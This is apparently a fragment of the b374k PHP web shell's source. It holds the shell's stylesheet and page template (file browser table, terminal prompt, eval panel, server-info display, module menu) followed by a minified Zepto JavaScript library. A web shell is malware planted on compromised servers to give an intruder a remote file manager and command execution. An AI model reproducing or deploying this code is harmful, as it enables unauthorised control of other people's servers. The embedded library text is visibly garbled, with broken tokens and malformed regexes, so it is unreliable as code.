    #xplTable tr>td:nth-child(4),#xplTable tr>td:nth-child(5),#xplTable tr>td:nth-child(6){
        text-align:center;
    }
    .dataView .col-owner{
        width:140px;
        min-width:140px;
        text-align:center;
    }
    .dataView .col-perms{
        width:80px;
        text-align:center;
    }
    .dataView .col-modified{
        width:150px;
        text-align:center;
    }
    .sortable th{
        cursor:pointer;
    }
    #xplTable td{
        white-space:nowrap;
    }
    #viewFile td{
        text-align:left;
```

```
}
#viewFilecontent{
    padding:8px;
    border:1px solid #dddddd;
    border-radius:8px;
}
#terminalPrompt td{
    padding:0;
}
#terminalInput{
    background:none;
    border:none;
    padding:0;
    width:100%;
}
#evalAdditional{
    display:none;
}
.hl_default{
    color:#517797;
}
.hl_keyword{
    color:#00BB00;
}
.hl_string{
    color:#000000;
}
.hl_html{
    color:#CE5403;
}
.hl_comment{
    color:#7F9F7F;
}
#navigation{position:fixed;left:-16px;top:46%;}
#totop,#tobottom,#toggleBasicInfo{background:url('?<?php echo get_resource('arrow');?>');width:32px;height:32px;opacity:0.30;margin:18px 0;cursor:pointer;}
#totop:hover,#tobottom:hover{opacity:0.80;}
#toggleBasicInfo{display:none;float:right;margin:0;}
#basicInfoSplitter{display:none;}
#tobottom{-webkit-transform:scaleY(-1);-moz-transform:scaleY(-1);-o-transform:scaleY(-1);transform:scaleY(-1);filter:FlipV;-ms-filter:"FlipV";}
#showinfo{float:right;display:none;}
#logout{float:right;}
</style>
</head>
<body>
<!--wrapper start-->
<div id='wrapper'>
    <!--header start-->
    <div id='header'>
        <!--header info start-->
        <div id='headerNav'>
            <span><a onclick="set_cookie('cwd','');" href='?<?php echo get_self();?>'><?php echo $GLOBALS['title']." ".$GLOBALS['ver']?></a></span>
            <img onclick='viewfileorfolder();' id='b374k' src='?<?php echo get_resource('b374k');?>' />&nbsp;<span id='nav'><?php echo $nav;?></span>
            <a class='boxclose' id='logout' title='log out'>x</a>
            <a class='boxclose' id='showinfo' title='show info'>v</a>
        </div>
        <!--header info end-->
        <!--menu start-->
        <div id='menu'>
            <?php
                foreach($GLOBALS['module_to_load'] as $k){
                    echo "<a class='menuitem' id='menu".$GLOBALS['module'][$k]['id']."' href='#!".$GLOBALS['module'][$k]['id']."'>".$GLOBALS['module'][$k]['title'
```

```

]."</a>";
    }
    ?>
</div>
<!--menu end-->

</div>
<!--header end-->

<!--content start-->
<div id='content'>
  <!--server info start-->
  <div id='basicInfo'>
    <div id='toggleBasicInfo'></div>
    <?php
    echo $error_html;
    foreach(get_server_info() as $k=>$v){
      echo "<div>".$v."</div>";
    }
    ?>
  </div>
  <!--server info end-->

  <?php
    foreach($GLOBALS['module_to_load'] as $k){
      $content = $GLOBALS['module'][$k]['content'];
      echo "<div class='menucontent' id='".$GLOBALS['module'][$k]
['id']."'>".$content."</div>";
    }
    ?>
  </div>
  <!--content end-->

</div>
<!--wrapper end-->
<div id='navigation'>
  <div id='totop'></div>
  <div id='tobottom'></div>
</div>
<table id="overlay"><tr><td><div id="loading" onclick="loading_stop();"></div></td></tr>
</table>
<form action='<?php echo get_self(); ?>' method='post' id='form' target='_blank'></form>
<!--script start-->
<script type='text/javascript'>
var targeturl = '<?php echo get_self(); ?>';
var module_to_load = '<?php echo implode(",", $GLOBALS['module_to_load']); ?>';
var win = '<?php echo (is_win())?'true':'false';?>';
var init_shell = true;
/* Zepto v1.1.2 - zepto event ajax form ie - zeptojs.com/license */
var Zepto=function(a){return a==null?String(a):z[A.call(a)]||"object"}function
H(a){return G(a)=="function"}function I(a){return a!=null&&a==a.window}function J(a){retur
n a!=null&&a.nodeType==a.DOCUMENT_NODE}function K(a){return G(a)=="object"}function L(a){re
turn K(a)&&!I(a)&&Object.getPrototypeOf(a)==Object.prototype}function M(a){return a instanc
eof Array}function N(a){return typeof a.length=="number"}function O(a){return g.call(a,func
tion(a){return a!=null})}function P(a){return a.length>0?c.fn.concat.apply([],a):a}function
Q(a){return a.replace(/::/g,"/").replace(/([A-Z]+)([A-Z][a-z])/g,"$1_$2").replace(/([a-z\d
])([A-Z])/g,"$1_$2").replace(/_/g,"-").toLowerCase()}function R(a){return a in j?j[a]:j[a]=
new RegExp("(^|\\s)"+"a+"+"(\\s|$)")}function S(a,b){return typeof b=="number"&&!k[Q(a)]?b+"px
":b}function T(a){var b,c;return i[a]||(b=h.createElement(a),h.body.appendChild(b),c=getCom
putedStyle(b,"").getPropertyValue("display"),b.parentNode.removeChild(b),c=="none"&&(c="blo
ck"),i[a]=c,i[a])}function U(a){return"children"in a?f.call(a.children):c.map(a.children)?
function(a){if(a.nodeType==1)return a}}function V(c,d,e){for(b in d)e&&(L(d[b])||M(d[b]))?
(L(d[b])&&!L(c[b])&&(c[b]={}),M(d[b])&&!M(c[b])&&(c[b]=[]),V(c[b],d[b],e)):d[b]!==a&&(c[b]=
d[b])}function W(a,b){return b==null?c(a):c(a).filter(b)}function X(a,b,c,d){return H(b)?b.
call(a,c,d):b}function Y(a,b,c){c==null?a.removeAttribute(b):a.setAttribute(b,c)}function Z
(b,c){var d=b.className,e=d&&d.baseVal!==a;if(c===a)return e?d.baseVal:d;e?d.baseVal=c:b.cl
assName=c}function $(a){var b;try{return a?a=="true"|| (a=="false"?!1:a=="null"?null:!/^0/.t
est(a)&&!isNaN(b=Number(a)))?b:/^\[\{\}/.test(a)?c.parseJSON(a):a}catch(d){return a}}func

```

```
tion _(a,b){b(a);for(var c in a.childNodes)_(a.childNodes[c],b)}var a,b,c,d,e=[],f=e.slice,
g=e.filter,h=window.document,i={},j={},k={"column-count":1,columns:1,"font-weight":1,"line-
height":1,opacity:1,"z-index":1,zoom:1},l=/^\s*(\w+|!)[^>]*>/,m=/^\s*(\w+)\s*\>(?<\/\>|)
$/ ,n=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:]|+)[^>]*)\/>/ig,o=/^(?:body|
html)$/i,p=/([A-Z])/g,q=["val","css","html","text","data","width","height","offset"],r=["af
ter","prepend","before","append"],s=h.createElement("table"),t=h.createElement("tr"),u={tr:
h.createElement("tbody"),tbody:s,thead:s,tfoot:s,td:t,th:t,"*":h.createElement("div")},v=/c
omplete|loaded|interactive/,w=/^\s*([\w-]+)$/,x=/^#([\w-]*)$/,y=/^\s*[\w-]*$/,z={},A=z.toString
,B={},C,D,E=h.createElement("div"),F={tabindex:"tabIndex",readonly:"readOnly","for":"htmlFo
r","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPad
ding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",content
editable:"contentEditable"};return B.matches=function(a,b){if(!b||!a||a.nodeType!==1)return
!1;var c=a.webkitMatchesSelector||a.mozMatchesSelector||a.oMatchesSelector||a.matchesSelect
or;if(c)return c.call(a,b);var d,e=a.parentNode,f=!e;return f&&(e=E).appendChild(a),d=~B.qsa
(a,e,b).indexOf(a),f&&E.removeChild(a),d},C=function(a){return a.replace(/-+([\w-])?/g,function
(a,b){return b.toUpperCase():""}),D=function(a){return g.call(a,function(b,c){return a.in
dexOf(b)==c}),B.fragment=function(b,d,e){var g,i,j;return m.test(b)&&(g=c(h.createElement
(RegExp.$1))),g||(b.replace&&(b=b.replace(n,"<$1></$2>")),d===a&&(d=l.test(b)&&RegExp.$1),d
in u||(d="*"),j=u[d],j.innerHTML=""+b,g=c.each(f.call(j.childNodes),function(){j.removeChil
d(this)}),L(e)&&(i=c(g),c.each(e,function(a,b){q.indexOf(a)>-1?i[a](b):i.attr(a,b)}),g),B
.Z=function(a,b){return a=a||[],a.__proto__=c.fn,a.selector=b||"",a},B.isZ=function(a){retu
rn a instanceof B.Z},B.init=function(b,d){var e;if(!b)return B.Z();if(typeof b=="string"){b
=b.trim();if(b[0]=="<"&&l.test(b))e=B.fragment(b,RegExp.$1,d),b=null;else{if(d===a)return c
(d).find(b);e=B.qsa(h,b)}}else{if(H(b))return c(h).ready(b);if(B.isZ(b))return b;if(M(b))e=
O(b);else if(K(b))e=[b],b=null;else if(l.test(b))e=B.fragment(b.trim(),RegExp.$1,d),b=null;
else{if(d===a)return c(d).find(b);e=B.qsa(h,b)}}return B.Z(e,b)},c=function(a,b){return B.i
nit(a,b)},c.extend=function(a){var b,c=c.call(arguments,1);return typeof a=="boolean"&&(b=a
,a=c.shift()),c.forEach(function(c){V(a,c,b)},a),B.qsa=function(a,b){var c,d=b[0]=="#" ,e=
d&&b[0]=="." ,g=d||e?b.slice(1):b,h=y.test(g);return J(a)&&h&&d?(c=a.getElementById(g)?[c]:
[]:a.nodeType!==1&&a.nodeType!==9?[[]:f.call(h&&!d?e?a.getElementsByClassName(g):a.getElemen
tsByTagName(b):a.querySelectorAll(b))],c.contains=function(a,b){return a!==b&&a.contains(b)
},c.type=G,c.isFunction=H,c.isWindow=I,c.isArray=M,c.isPlainObject=L,c.isEmptyObject=functi
on(a){var b;for(b in a)return!1;return!0},c.inArray=function(a,b,c){return e.indexOf.call(b
,a,c)},c.camelCase=C,c.trim=function(a){return a==null?"":String.prototype.trim.call(a)},c
.uid=0,c.support={},c.expr={},c.map=function(a,b){var c,d=[],e,f;if(N(a))for(e=0;e<a.length
;e++)c=b(a[e],e),c!=null&&d.push(c);else for(f in a)c=b(a[f],f),c!=null&&d.push(c);return P
(d)},c.each=function(a,b){var c,d;if(N(a)){for(c=0;c<a.length;c++)if(b.call(a[c],c,a[c])===
!1)return a}else for(d in a)if(b.call(a[d],d,a[d])===!1)return a;return a},c.grep=function(
a,b){return g.call(a,b)},window.JSON&&(c.parseJSON=JSON.parse),c.each("Boolean Number Strin
g Function Array Date RegExp Object Error".split(" "),function(a,b){z["[object "+b+"]"]=b.t
oLowerCase()}),c.fn={forEach:e.forEach,reduce:e.reduce,push:e.push,sort:e.sort,indexOf:e.in
dexOf,concat:e.concat,map:function(a){return c(c.map(this,function(b,c){return a.call(b,c,b)
}))},slice:function(){return c(f.apply(this,arguments))},ready:function(a){return v.test(h
.readyState)&&h.body?a(c):h.addEventListener("DOMContentLoaded",function(){a(c)},!1),this},
get:function(b){return b===a?f.call(this):this[b>=0?b:b+this.length]},toArray:function(){re
turn this.get()},size:function(){return this.length},remove:function(){return this.each(fun
ction(){this.parentNode!=null&&this.parentNode.removeChild(this)}),each:function(a){return
e.every.call(this,function(b,c){return a.call(b,c,b)!==!1}),this},filter:function(a){return
H(a)?this.not(this.not(a)):c(g.call(this,function(b){return B.matches(b,a)})),add:functi
on(a,b){return c(D(this.concat(c(a,b))))},is:function(a){return this.length>0&&B.matches(th
is[0],a)},not:function(b){var d=[];if(H(b)&&b.call!==a)this.each(function(a){b.call(this,a)
||d.push(this)});else{var e=typeof b=="string"?this.filter(b):N(b)&&H(b.item)?f.call(b):c(b)
;this.forEach(function(a){e.indexOf(a)<0&&d.push(a)});return c(d)},has:function(a){return
this.filter(function(){return K(a)?c.contains(this,a):c(this).find(a).size()}),eq:functi
on(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){var a=this[0];return
a&&!K(a)?a:c(a)},last:function(){var a=this[this.length-1];return a&&!K(a)?a:c(a)},find:fun
ction(a){var b,d=this;return typeof a=="object"?b=c(a).filter(function(){var a=this;return
e.some.call(d,function(b){return c.contains(b,a)})):this.length===1?b=c(B.qsa(this[0],a)):b=
this.map(function(){return B.qsa(this,a)},b),closest:function(a,b){var d=this[0],e=!1;type
of a=="object"&&(e=c(a));while(d&&!e){e=e.indexOf(d)>=0:B.matches(d,a)}d=d===b&&!J(d)&&d.par
entNode;return c(d)},parents:function(a){var b=[],d=this;while(d.length>0)d=c.map(d,functio
n(a){if((a=a.parentNode)&&!J(a)&&b.indexOf(a)<0)return b.push(a),a});return W(b,a)},parent:
function(a){return W(D(this.pluck("parentNode")),a)},children:function(a){return W(this.map
(function(){return U(this)},a)},contents:function(){return this.map(function(){return f.ca
ll(this.childNodes)}),siblings:function(a){return W(this.map(function(a,b){return g.call(U
(b.parentNode),function(a){return a!==b})),a)},empty:function(){return this.each(function(
){this.innerHTML=""}),pluck:function(a){return c.map(this,function(b){return b[a]}),show:
function(){return this.each(function(){this.style.display=="none"&&(this.style.display="")
,
```

```
getComputedStyle(this, "").getPropertyValue("display")=="none"&&(this.style.display=T(this.nodeName))},replaceWith:function(a){return this.before(a).remove(),wrap:function(a){var b=H(a);if(this[0]&&!b)var d=c(a).get(0),e=d.parentNode||this.length>1;return this.each(function(f){c(this).wrapAll(b?a.call(this,f):e?d.cloneNode(!0):d)}),wrapAll:function(a){if(this[0]){c(this[0]).before(a=c(a));var b;while((b=a.children()).length)a=b.first();c(a).append(this)}return this},wrapInner:function(a){var b=H(a);return this.each(function(d){var e=c(this),f=e.contents(),g=b?a.call(this,d):a;f.length?f.wrapAll(g):e.append(g)}),unwrap:function(){return this.parent().each(function(){c(this).replaceWith(c(this).children())},this),clone:function(){return this.map(function(){return this.cloneNode(!0)}),hide:function(){return this.css("display","none")},toggle:function(b){return this.each(function(){var d=c(this);(b===a?d.css("display")=="none":b)?d.show():d.hide()})},prev:function(a){return c(this.pluck("previousElementSibling")).filter(a||"*")},next:function(a){return c(this.pluck("nextElementSibling")).filter(a||"*")},html:function(a){return arguments.length===0?this.length>0?this[0].innerHTML:null:this.each(function(b){var d=this.innerHTML;c(this).empty().append(X(this,a,b,d))}),text:function(b){return arguments.length===0?this.length>0?this[0].textContent:null:this.each(function(){this.textContent=b===a?"":" "+b})},attr:function(c,d){var e;return typeof c=="string"&&d===a?this.length===0||this[0].nodeType!==1?a:c=="value"&&this[0].nodeName=="INPUT"?this.val():!(e=this[0].getAttribute(c))&&c in this[0]?this[0][c]:this.each(function(a){if(this.nodeType!==1)return;if(K(c))for(b in c)Y(this,b,c[b]);else Y(this,c,X(this,d,a,this.getAttribute(c)))}),removeAttr:function(a){return this.each(function(){this.nodeType===1&&Y(this,a)}),prop:function(b,c){return b=F[b]||b,c===a?this[0]&&this[0][b]:this.each(function(a){this[b]=X(this,c,a,this[b])}),data:function(b,c){var d=this.attr("data-"+b.replace(p,"-$1").toLowerCase(),c);return d!==null?$(d):a},val:function(a){return arguments.length===0?this[0]&&(this[0].multiple?c(this[0]).find("option").filter(function(){return this.selected}).pluck("value"):this[0].value):this.each(function(b){this.value=X(this,a,b,this.value)}),offset:function(a){if(a)return this.each(function(b){var d=c(this),e=X(this,a,b,d.offset()),f=d.offsetParent().offset(),g={top:e.top-f.top,left:e.left-f.left};d.css("position")=="static"&&(g.position="relative"),d.css(g)};if(this.length===0)return null;var b=this[0].getBoundingClientRect();return{left:b.left+window.pageXOffset,top:b.top+window.pageYOffset,width:Math.round(b.width),height:Math.round(b.height)}},css:function(a,d){if(arguments.length<2){var e=this[0],f=getComputedStyle(e,"");if(!e)return;if(typeof a=="string")return e.style[C(a)]||f.getPropertyValue(a);if(M(a)){var g={};return c.each(M(a)?a:[a],function(a,b){g[b]=e.style[C(b)]||f.getPropertyValue(b)}),g}var h="";if(G(a)=="string")!d&&!d===0?this.each(function(){this.style.removeProperty(Q(a))}):h=Q(a)+" ":" "+S(a,d);else for(b in a)!a[b]&&a[b]!==0?this.each(function(){this.style.removeProperty(Q(b))}):h+=Q(b)+" ":" "+S(b,a[b])+" ";return this.each(function(){this.style.cssText+=" "+h})},index:function(a){return a?this.indexOf(c(a)[0]):this.parent().children().indexOf(this[0])},hasClass:function(a){return a?this.some.call(this,function(a){return this.test(Z(a))},R(a)):!1},addClass:function(a){return a?this.each(function(b){d=[];var e=Z(this),f=X(this,a,b,e);f.split(/\s+/g).forEach(function(a){c(this).hasClass(a)||d.push(a)},this),d.length&&Z(this,e+" ":" "+d.join(" "))}:this},removeClass:function(b){return this.each(function(c){if(b===a)return Z(this,"");d=Z(this),X(this,b,c,d).split(/\s+/g).forEach(function(a){d=d.replace(R(a)," ")}),Z(this,d.trim())},toggleClass:function(b,d){return b?this.each(function(e){var f=c(this),g=X(this,b,e,Z(this));g.split(/\s+/g).forEach(function(b){(d===a?!f.hasClass(b):d)?f.addClass(b):f.removeClass(b)}):this},scrollTop:function(b){if(!this.length)return;var c="scrollTop" in this[0];return b===a?c?this[0].scrollTop:this[0].pageYOffset:this.each(c?function(){this.scrollTo(this.scrollX,b)}):function(){this.scrollTo(this.scrollX,b)}},scrollLeft:function(b){if(!this.length)return;var c="scrollLeft" in this[0];return b===a?c?this[0].scrollLeft:this[0].pageXOffset:this.each(c?function(){this.scrollLeft=b}:function(){this.scrollTo(b,this.scrollY)}),position:function(){if(!this.length)return;var a=this[0],b=this.offsetParent(),d=this.offset(),e=offset(b[0].nodeName)?{top:0,left:0}:b.offset();return d.top-=parseFloat(c(a).css("margin-top"))||0,d.left-=parseFloat(c(a).css("margin-left"))||0,e.top+=parseFloat(c(b[0]).css("border-top-width"))||0,e.left+=parseFloat(c(b[0]).css("border-left-width"))||0,{top:d.top-e.top,left:d.left-e.left}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||h.body;while(a&&!o.test(a.nodeName)&&c(a).css("position")=="static")a=a.offsetParent;return a})},c.fn.detach=c.fn.remove,["width","height"].forEach(function(b){var d=b.replace(/./,function(a){return a[0].toUpperCase()});c.fn[b]=function(e){var f,g=this[0];return e===a?I(g)?g["inner"+d]:J(g)?g.documentElement["scroll"+d):(f=this.offset())&&f[b]:this.each(function(a){g=c(this),g.css(b,X(this,e,a,g[b]()))}}),r.forEach(function(a,b){var d=b%2;c.fn[a]=function(){var a,e=c.map(arguments,function(b){return a=G(b),a=="object"||a=="array"||b===null?b:B.fragment(b)},f,g=this.length>1;return e.length<1?this:this.each(function(a,h){f=d?h.parentNode,h=b===0?h.nextSibling:b===1?h.firstChild:b===2?h:null,e.forEach(function(a){if(f(g)a=a.cloneNode(!0);else if(!f)return c(a).remove();_(f.insertBefore(a,h),function(a){a.nodeName!=null&&a.nodeName.toUpperCase()=== "SCRIPT"&&(!a.type||a.type==="text/javascript")&&!a.src&&window.eval.call(window,a.innerHTML)}))}),c.fn[d?a+"To":"insert"+(b?"Before":"After")]=function(b){return c(b)[a](this,this)},B.Z.prototype=c.fn,B.uniq=D,B.deserializeValue=$,czepto=B,c}());window.Zepto=Zepto,window.$===undefined&&(window.$=Zepto),function(a){function m(a){return a._zid||(a._zid=c++)}function n(a,b,c,d){b=o(b);if(b.ns)var e=p(b.ns);r
```



```
return(h[m(a)]||[]).filter(function(a){return a&&(!b.e||a.e==b.e)&&(!b.ns||e.test(a.ns))&&(!c||m(a.fn)==m(c))&&(!d||a.sel==d)})function o(a){var b=(""+a).split(".");return{e:b[0],ns:b.slice(1).sort().join(" ")}}function p(a){return new RegExp("(?:^| )" + a.replace(" ", ".*?") + "(?:|$)")}function q(a,b){return a.del&&!j&&a.e in k||!b}function r(a){return l[a]||j&&k[a]||a}function s(b,c,e,f,g,i,j){var k=m(b),n=h[k]||(h[k]=[]);c.split(/\s/).forEach(function(c){if(c=="ready")return a(document).ready(e);var h=o(c);h.fn=e,h.sel=g,h.e in l&&(e=function(b){var c=b.relatedTarget;if(!c||c!==this&&!a.contains(this,c))return h.fn.apply(this,arguments)}),h.del=i;var k=i||e;h.proxy=function(a){a=y(a);if(a.isImmediatePropagationStopped())return;a.data=f;var c=k.apply(b,a._args==d?[a]:[a].concat(a._args));return c===!l&&(a.preventDefault(),a.stopPropagation()),c},h.i=n.length,n.push(h),"addEventListener"in b&&b.addEventListener(r(h.e),h.proxy,q(h,j))})}function t(a,b,c,d,e){var f=m(a);(b||"").split(/\s/).forEach(function(b){n(a,b,c,d).forEach(function(b){delete h[f][b.i],"removeEventListener"in a&&a.removeEventListener(r(b.e),b.proxy,q(b,e))})})}function y(b,c){if(c||!b.isDefaultPrevented){c||(c=b),a.each(x,function(a,d){var e=c[a];b[a]=function(){return this[d]=u,e&&e.apply(c,arguments)},b[d]=v});if(c.defaultPrevented!==d?c.defaultPrevented:"returnValue"in c?c.returnValue===!1:c.getPreventDefault&&c.getPreventDefault())b.isDefaultPrevented=u}return b}function z(a){var b,c={originalEvent:a};for(b in a)!w.test(b)&&a[b]!==d&&(c[b]=a[b]);return y(c,a)}var b=azepto.qsa,c=1,d,e=Array.prototype.slice,f=a.isFunction,g=function(a){return typeof a=="string"},h={},i={},j="onfocusin" in window,k={focus:"focusin",blur:"focusout"},l={mouseenter:"mouseover",mouseleave:"mouseout"};i.click=i.mousedown=i.mouseup=i.mousemove="MouseEvents",a.event={add:s,remove:t},a.proxy=function(b,c){if(f(b)){var d=function(){return b.apply(c,arguments)};return d._zid=m(b),d}if(g(c))return a.proxy(b[c],b);throw new TypeError("expected function")},a.fn.bind=function(a,b,c){return this.on(a,b,c)},a.fn.unbind=function(a,b){return this.off(a,b)},a.fn.one=function(a,b,c,d){return this.on(a,b,c,d,1)};var u=function(){return!0},v=function(){return!1},w=/^[A-Z]|returnValue$|layer[XY]$/,x={preventDefault:"isDefaultPrevented",stopImmediatePropagation:"isImmediatePropagationStopped",stopPropagation:"isPropagationStopped"};a.fn.delegate=function(a,b,c){return this.on(b,a,c)},a.fn.undelegate=function(a,b,c){return this.off(b,a,c)},a.fn.live=function(b,c){return a(document.body).delegate(this.selector,b,c),this},a.fn.die=function(b,c){return a(document.body).undelegate(this.selector,b,c),this},a.fn.on=function(b,c,h,i,j){var k,l,m=this;if(b&&!g(b))return a.each(b,function(a,b){m.on(a,c,h,b,j)}),m;!g(c)&&!f(i)&&i!==!l&&(i=h,h=c,c=d);if(f(h)||h===!1)i=h,h=d;return i===!l&&(i=v),m.each(function(d,f){j&&(k=function(a){return t(f,a.type,i),i.apply(this,arguments)}),c&&(l=function(b){var d,g=a(b.target).closest(c,f).get(0);if(g&&g!==f)return d=a.extend(z(b),{currentTarget:g,liveFired:f}),(k||i).apply(g,[d].concat(e.call(arguments,1))))},s(f,b,i,h,c,l||k))},a.fn.off=function(b,c,e){var h=this;return b&&!g(b)?(a.each(b,function(a,b){h.off(a,c,b)}),h):(!g(c)&&!f(e)&&e!==!l&&(e=c,c=d),e===!l&&(e=v),h.each(function(){t(this,b,e,c)}))},a.fn.trigger=function(b,c){return b=g(b)||a.isPlainObject(b)?a.Event(b):y(b),b._args=c,this.each(function(){this.dispatchEvent"in this?this.dispatchEvent(b):a(this).triggerHandler(b,c)}),a.fn.triggerHandler=function(b,c){var d,h;return this.each(function(f,h){d=z(g(b)?a.Event(b):b),d._args=c,d.target=h,a.each(n(h,b.type||b),function(a,b){e=b.proxy(d);if(d.isImmediatePropagationStopped())return!1}}),e},"focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select keydown keypress keyup error".split(" ").forEach(function(b){a.fn[b]=function(a){return a?this.bind(b,a):this.trigger(b)}},["focus","blur"]).forEach(function(b){a.fn[b]=function(a){return a?this.bind(b,a):this.each(function(){try{this[b]() }catch(a){}}),this}}),a.Event=function(a,b){g(a)|| (b=a,a=b.type);var c=document.createElement(i[a]||"Events"),d=!0;if(b)for(var e in b)e=="bubbles"?d=!b[e]:c[e]=b[e];return c.initEvent(a,d,!0),y(c)}(Zepto,function($){function triggerAndReturn(a,b,c){var d=$.Event(b);return $.trigger(d,c),!d.isDefaultPrevented()}function triggerGlobal(a,b,c,d){if(a.global)return triggerAndReturn(b|document,c,d)}function ajaxStart(a){a.global&&$.active++===0&&triggerGlobal(a,null,"ajaxStart")}function ajaxStop(a){a.global&&$.active&&triggerGlobal(a,null,"ajaxStop")}function ajaxBeforeSend(a,b){var c=b.context;if(b.beforeSend.call(c,a,b)===!1||triggerGlobal(b,c,"ajaxBeforeSend",[a,b])===!1)return!1;triggerGlobal(b,c,"ajaxSend",[a,b])}function ajaxSuccess(a,b,c,d){var e=c.context,f="success";c.success.call(e,a,f,b),d&&d.resolveWith(e,[a,f,b]),triggerGlobal(c,e,"ajaxSuccess",[b,c,a]),ajaxComplete(f,b,c)}function ajaxError(a,b,c,d,e){var f=d.context;d.error.call(f,c,b,a),e&&e.rejectWith(f,[c,b,a]),triggerGlobal(d,f,"ajaxError",[c,d,a|b]),ajaxComplete(b,c,d)}function ajaxComplete(a,b,c){var d=c.context;c.complete.call(d,b,a),triggerGlobal(c,d,"ajaxComplete",[b,c]),ajaxStop(c)}function empty(){}function mimeTypeToDataType(a){return a&&(a=a.split(";")[0]),a&&(a==htmlType?"html":a==jsonType?"json":scriptTypeRE.test(a)?"script":xmlTypeRE.test(a)&&"xml")||"text"}function appendQuery(a,b){return b==""?a:(a+"&" + b).replace(/[\&?]{1,2}/,"?")}function serializeData(a){a.processData&&a.data&&$.type(a.data)!="string"&&(a.data=$.param(a.data,a.traditional)),a.data&&(!a.type||a.type.toUpperCase()=="GET")&&(a.url=appendQuery(a.url,a.data),a.data=undefined)}function parseArguments(a,b,c,d){var e=!$.isFunction(b);return {url:a,data:e?b:undefined,success:e?$.isFunction(c)?c:undefined:b,dataType:e?d||c:c}function serialize(a,b,c,d){var e,f=$.isArray(b),g=$.isPlainObject(b);$.each(b,function(b,h){e=$.type(h),d&&(b=c?d:d+"["+(g||e=="object"||e=="array"?b:"")+"]"),!d&&f?a.add(h.name,h.value):e=="array"||!c&&e=="object"?serialize(a,h,c,b):a.add(b,h)})}var jsonpID=0,document=window.d
```

```
ocument, key, name, rscript=</script> \b[^\<]* (?:(?!</script>) <[^\<]* > \</script> /gi, scriptTypeRE
= / ^ (? : text | application ) \ / javascript / i, xmlTypeRE = / ^ (? : text | application ) \ / xml / i, jsonType = "app
lication / json", htmlType = "text / html", blankRE = / ^ \s * $ /; $.active = 0, $.ajaxJSONP = function (a, b) { if
("type" in a) { var c = a.jsonpCallback, d = ($.isFunction(c) ? c() : c) || "jsonp" + ++jsonpID, e = document
.createElement("script"), f = window[d], g, h = function (a) { $(e).triggerHandler("error", a || "abort"
)}, i = {abort: h}, j; return b && b.promise(i), $(e).on("load error", function (c, h) { clearTimeout(j),
$(e).off().remove(), c.type === "error" || !g ? ajaxError(null, h || "error", i, a, b) : ajaxSuccess(g[0], i
, a, b), window[d] = f, g && $.isFunction(f) && f(g[0]), f = g = undefined}), ajaxBeforeSend(i, a) === !1 ? (h("
abort"), i) : (window[d] = function () { g = arguments, e.src = a.url.replace(/=\?/, "=" + d), document.hea
d.appendChild(e), a.timeout > 0 && (j = setTimeout(function () { h("timeout") }, a.timeout)), i) } return
$.ajax(a)}, $.ajaxSettings = {type: "GET", beforeSend: empty, success: empty, error: empty, complete: e
mpty, context: null, global: !0, xhr: function () { return new window.XMLHttpRequest}, accepts: {scrip
t: "text / javascript, application / javascript, application / x-javascript", json: jsonType, xml: "ap
plication / xml, text / xml", html: htmlType, text: "text / plain"}, crossDomain: !1, timeout: 0, processD
ata: !0, cache: !0}, $.ajax = function (options) { var settings = $.extend({}, options || {}, {deferred: $.
Deferred && $.Deferred()}; for (key in $.ajaxSettings) settings[key] === undefined && (settings[key] =
$.ajaxSettings[key]); ajaxStart(settings), settings.crossDomain || (settings.crossDomain = / ^ ([\w
- ] + :)? \ / \ / ([^\ / ] +) / .test(settings.url) && RegExp.$2 !== window.location.host), settings.url || (set
tings.url = window.location.toString()), serializeData(settings), settings.cache === !1 && (setting
s.url = appendQuery(settings.url, "_" + Date.now())); var dataType = settings.dataType, hasPlacehol
der = / = \? / .test(settings.url); if (dataType === "jsonp" || hasPlaceholder) return hasPlaceholder || (s
ettings.url = appendQuery(settings.url, settings.jsonp ? settings.jsonp + "?" : settings.jsonp === !1
? "?" : "callback = ?"), $.ajaxJSONP(settings, deferred); var mime = settings.accepts[dataType], heade
rs = {}, setHeader = function (a, b) { headers[a.toLowerCase()] = [a, b]}, protocol = / ^ ([\w- ] + :)? \ / \ / .tes
t(settings.url) ? RegExp.$1 : window.location.protocol, xhr = settings.xhr(), nativeSetHeader = xhr.s
etRequestHeader, abortTimeout, deferred && deferred.promise(xhr), settings.crossDomain || setHeader
("X-Requested-With", "XMLHttpRequest"), setHeader("Accept", mime || "* / *"); if (mime = settings.mim
eType || mime).mime.indexOf(",") > -1 && (mime = mime.split(",", 2)[0]), xhr.overrideMimeType && xhr.ove
rrideMimeType(mime); (settings.contentType || settings.contentType !== !1 && settings.data && settin
gs.type.toUpperCase() !== "GET") && setHeader("Content-Type", settings.contentType || "application /
x-www-form-urlencoded"); if (settings.headers) for (name in settings.headers) setHeader(name, set
tings.headers[name]); xhr.setRequestHeader = setHeader, xhr.onreadystatechange = function () { if (xh
r.readyState === 4) { xhr.onreadystatechange = empty, clearTimeout(abortTimeout); var result, error = !
1; if (xhr.status >= 200 && xhr.status < 300 || xhr.status === 304 || xhr.status === 0 && protocol === "file:") { da
taType = dataType || mimeToDataType(settings.mimeType || xhr.getResponseHeader("content-type")), r
esult = xhr.responseText; try { dataType === "script" ? (1, eval)(result) : dataType === "xml" ? result = xhr.r
esponseXML : dataType === "json" && (result = blankRE.test(result) ? null : $.parseJSON(result)) } catch (e
) { error = e } error ? ajaxError(error, "parsererror", xhr, settings, deferred) : ajaxSuccess(result, xhr
, settings, deferred) } else ajaxError(xhr.statusText || null, xhr.status ? "error" : "abort", xhr, sett
ings, deferred) }; if (ajaxBeforeSend(xhr, settings) === !1) return xhr.abort(), ajaxError(null, "ab
ort", xhr, settings, deferred), xhr; if (settings.xhrFields) for (name in settings.xhrFields) xhr[na
me] = settings.xhrFields[name]; var async = "async" in settings ? settings.async : !0; xhr.open(settin
gs.type, settings.url, async, settings.username, settings.password); for (name in headers) nativeS
etHeader.apply(xhr, headers[name]); return settings.timeout > 0 && (abortTimeout = setTimeout(func
tion () { xhr.onreadystatechange = empty, xhr.abort(), ajaxError(null, "timeout", xhr, settings, deferr
ed)}, settings.timeout), xhr.send(settings.data ? settings.data : null), xhr), $.get = function (a, b,
c, d) { return $.ajax(parseArguments.apply(null, arguments)) }, $.post = function (a, b, c, d) { var e = pa
